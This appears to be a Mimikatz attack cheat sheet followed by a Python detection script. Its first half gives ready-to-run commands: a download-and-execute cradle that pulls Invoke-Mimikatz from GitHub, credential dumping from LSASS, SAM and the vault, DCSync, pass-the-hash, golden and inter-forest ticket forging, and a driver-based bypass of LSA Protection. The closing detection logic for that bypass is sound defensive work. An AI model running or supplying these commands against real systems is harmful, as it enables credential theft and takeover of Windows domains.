Mimikatz
Dump Credentials
# Download and execute in cradle
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/master/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')
# Dump creds from memory
Invoke-Mimikatz -DumpCreds
# DCSync Attack
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:security.local /user:moe"'
# Dump local passwords
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"'
# Dump Credential Vault
Invoke-Mimikatz -Command '"token::elevate" "vault::cred /patch"'
# Dump credentials on remote systems
Invoke-Mimikatz -DumpCreds -ComputerName @("WS01","WS02")
Dump Domain Credentials
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'
Spawn PowerShell (with compromised NTLM hash)
Invoke-Mimikatz -Command '"sekurlsa::pth /user:DomainAdmin /domain:Security.local /ntlm:b38ff50264b7458734d82c69794a4d8 /run:powershell.exe"'
Forge Inter-domain trust ticket
# Obtain trust key between current domain and external domain
Invoke-Mimikatz -Command '"lsadump::trust /patch"'
# An inter-forest TGT can be forged
Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:Security.local /sid:S-1-5-21-1874506000-3219952063-538504511 /rc4:815720462a1b48256f16740b70356b7f /service:krbtgt /target:Vault.local /ticket:C:\AD\trust_forest_tkt.kirbi"'
Over pass the hash
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:Security.local /ntlm:<ntlmhash> /run:powershell.exe"'
Protection Bypass
The image below (a screenshot of the Mimikatz session) shows an attempt to access the lsass.exe process, extract clear-text passwords and run a skeleton key attack. As we can see, the attempt was not successful once the registry key change described in the mitigation section for LSA Protection had been applied.

We can check whether the LSA Protection RunAsPPL key exists by querying the registry, which confirms that LSA Protection is in place.
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v "RunAsPPL"
# Value 0x1 means LSA Protection is enabled
This can be bypassed by utilizing the mimidrv.sys driver file, which is included as a separate file with Mimikatz. The driver can be loaded by running the command !+ in Mimikatz. After doing so, the following command can be executed to protect the mimikatz.exe process.
!processProtect /process:mimikatz.exe
The same command with the /remove flag can be used to strip the process protection from a process such as lsass.exe.
!processprotect /process:lsass.exe /remove
From here we should be free to perform actions against LSASS and dump credentials from it.
mimikatz.exe sekurlsa::logonpasswords
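The driver-based bypass above leaves a recognisable trail on the host: a kernel-mode driver service is installed from outside the system driver directory, an unsigned (or known tooling) driver is loaded, and a process then opens lsass.exe with memory-read access. The following Python is an added example of detection logic for that sequence; it is not from this page or from the Mimikatz project. It runs over constructed Sysmon-style records (Event ID 6 DriverLoad, Event ID 10 ProcessAccess) and a System-log 7045 service-install record embedded inline; the field names follow Sysmon and System-log naming, while the rule names, sample paths and the source-process allowlist are assumptions to be tuned per environment.

```python
"""Detection logic for the LSA Protection bypass path described above:
install/load the mimidrv.sys kernel driver, then read lsass.exe memory.
Runs over constructed Sysmon-style events (not real telemetry)."""
import ntpath
from dataclasses import dataclass

PROCESS_VM_READ = 0x0010               # access right needed to read LSASS memory
KNOWN_TOOL_DRIVERS = {"mimidrv.sys"}   # driver shipped with Mimikatz (named on the page)
SYSTEM_DRIVER_DIR = r"c:\windows\system32\drivers"

# Constructed sample events (assumed values): Sysmon ID 6 driver loads,
# a System-log 7045 service install, and Sysmon ID 10 process-access records.
SAMPLE_EVENTS = [
    {"EventID": 6, "ImageLoaded": r"C:\Windows\System32\drivers\tcpip.sys",
     "Signed": "true", "Signature": "Microsoft Windows"},
    {"EventID": 7045, "ServiceName": "mimidrv",
     "ImagePath": r"C:\Tools\mimidrv.sys", "ServiceType": "kernel mode driver"},
    {"EventID": 6, "ImageLoaded": r"C:\Tools\mimidrv.sys",
     "Signed": "false", "Signature": ""},
    {"EventID": 10, "SourceImage": r"C:\Tools\mimikatz.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
]


@dataclass
class Finding:
    rule: str     # hypothetical rule name chosen for this example
    detail: str


def _basename(path: str) -> str:
    # ntpath handles Windows separators regardless of the host OS
    return ntpath.basename(path).lower()


def check_driver_load(ev):
    """Sysmon ID 6: flag known tooling drivers and any unsigned driver."""
    if ev.get("EventID") != 6:
        return None
    name = _basename(ev["ImageLoaded"])
    if name in KNOWN_TOOL_DRIVERS:
        return Finding("known-tool-driver-loaded", ev["ImageLoaded"])
    if ev.get("Signed", "").lower() != "true":
        return Finding("unsigned-driver-loaded", ev["ImageLoaded"])
    return None


def check_service_install(ev):
    """System 7045: flag kernel-driver services whose binary lives outside
    the system driver directory (the !+ command registers such a service)."""
    if ev.get("EventID") != 7045:
        return None
    if "kernel" not in ev.get("ServiceType", "").lower():
        return None
    path = ev["ImagePath"]
    outside = not path.lower().startswith(SYSTEM_DRIVER_DIR)
    if _basename(path) in KNOWN_TOOL_DRIVERS or outside:
        return Finding("kernel-driver-service-outside-system-dir",
                       f'{ev["ServiceName"]} -> {path}')
    return None


def check_lsass_access(ev, allowed_sources=frozenset()):
    """Sysmon ID 10: flag handles to lsass.exe that carry PROCESS_VM_READ
    from a source image not on the per-environment allowlist."""
    if ev.get("EventID") != 10:
        return None
    if _basename(ev["TargetImage"]) != "lsass.exe":
        return None
    access = int(ev["GrantedAccess"], 16)
    if access & PROCESS_VM_READ and _basename(ev["SourceImage"]) not in allowed_sources:
        return Finding("lsass-memory-read",
                       f'{ev["SourceImage"]} access={ev["GrantedAccess"]}')
    return None


def analyze(events, allowed_sources=frozenset()):
    """Run every check over a list of events; return findings in event order."""
    findings = []
    for ev in events:
        for check in (check_driver_load, check_service_install):
            hit = check(ev)
            if hit:
                findings.append(hit)
        hit = check_lsass_access(ev, allowed_sources)
        if hit:
            findings.append(hit)
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.detail}")
```

On the constructed input the signed tcpip.sys load and the svchost.exe handle (0x1000, no PROCESS_VM_READ) produce nothing, while the mimidrv service install, the unsigned mimidrv.sys load and the mimikatz.exe handle to lsass.exe each raise a finding. The same three checks map directly onto Get-WinEvent queries for the live System and Sysmon channels; the 7045 and driver-load signals in particular are worth alerting on even when RunAsPPL is set, since driver loading is exactly how the protection is removed.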